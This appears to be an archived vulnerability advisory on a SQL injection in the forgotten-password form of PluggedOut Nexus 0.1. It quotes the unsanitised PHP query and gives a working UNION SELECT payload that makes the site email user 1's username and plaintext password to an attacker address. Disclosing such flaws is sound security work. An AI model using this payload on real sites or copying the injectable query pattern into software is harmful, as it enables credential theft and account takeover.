PluggedOut Nexus SQL injection



PluggedOut Nexus SQL injection
Nexus is an open source script you can run on your web
server to give you a community based website
where people can register, search each others
interests, and communicate with one another either
through a private messaging system, or via chat
requests and forums.
Project : PluggedOut Nexus
Version : 0.1
Author : Jonathan Beckett
Home : http://www.pluggedout.com

Credit:
The information has been provided by Hamid Ebadi .
( Hamid Network Security Team): admin[AT]hamid[o]ir
The original article can be found at:
http://hamid.ir/security/

Vulnerable Systems:PluggedOut Nexus 0.1

http://localhost/Nexus/forgotten_password.php

in this address If you fill the private email address
that you used while creating your account into the
form , the server will send you an email to that
address with your login details
Input passed to the "email" parameter in
"forgotten_password.php" isn't properly sanitised
before being used in a SQL query. This can be
exploited to manipulate SQL queries by injecting
arbitrary SQL code.

test:
in E-Mail Address form enter ' and press Send Request
you will redirect to
http://localhost/Nexus/site_problem.php and see :

Problem with Nexus website
A problem has occurred with the Nexus website - this
was not your fault, and the administrators probably
already know about it.


Vulnerable Code: The following lines in
"forgotten_password.php" :
---------------------------~=[Vulnerable
Code]=~---------------------------
if ($_POST["submit"]!=""){
$con = db_connect();
$sql = "SELECT cUsername,cPassword,cEMailPrivate FROM
nexus_users WHERE
cEMailPrivate='".$_POST["email"]."'";
$result = mysql_query($sql,$con);
if ($result!=false){
if (mysql_num_rows($result)>0){
$row = mysql_fetch_array($result);
$from = $site_admin_email;
$to = $row["cEMailPrivate"];
$subject = "Reminder Username/Password from
".$site_long_name."";
$body = "This email has been sent following a
request for a reminder username/password in the
".$site_long_name." website.\n\n"
."Your account details are as follows;\n"
." Username : ".$row["cUsername"]."\n"
." Password : ".$row["cPassword"]."\n\n"
."If you did not request this reminder message,
please contact the ".$site_long_name." administrator
(".$admin_email.")\n";

send_email($from,$to,$subject,$body);

---------------------------~=[/Vulnerable
Code]=~---------------------------


exploit:

insert this code in E-Mail Address form
(http://localhost/Nexus/forgotten_password.php) :
hamidnetworksecurityteam' union select
cUsername,cPassword,'ATTACKER@xxxxxxxxxxxxx' from
nexus_users WHERE nUserId=1 and '1'='1

and ATTACKER@xxxxxxxxxxxxx recieve email contain
username & password for userID=1 .

Signature



__________________________________________________
Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam protection around
http://mail.yahoo.com



Relevant Pages

  • Re: Some Clarifications
    ... If you restrict yourself on e.g. ODBC or DBExpress you will not get even ... if one is restricting oneself to same one set of data access ... Abstract, you can access NexusDB through native nxdb components, SQL Server ... My advice to Bradley would be that if he just wants one db, nexus is a very ...
    (borland.public.delphi.non-technical)
  • Re: Accuracer Database
    ... > I am looking at Nexus, and have not ruled it out. ... which embedded database to use? ... NexusDB, Firebird and DBISAM, or the Think SQL if you think that looks good) ... and evaluate the two or three best contenders in some detail - run your own ...
    (borland.public.delphi.thirdpartytools.general)
  • Re: Database component
    ... Currently not SQL based. ... You can write your own plug-ins which can ... accomplish the same thing. ... Nexus is a terrific DB; ...
    (borland.public.delphi.thirdpartytools.general)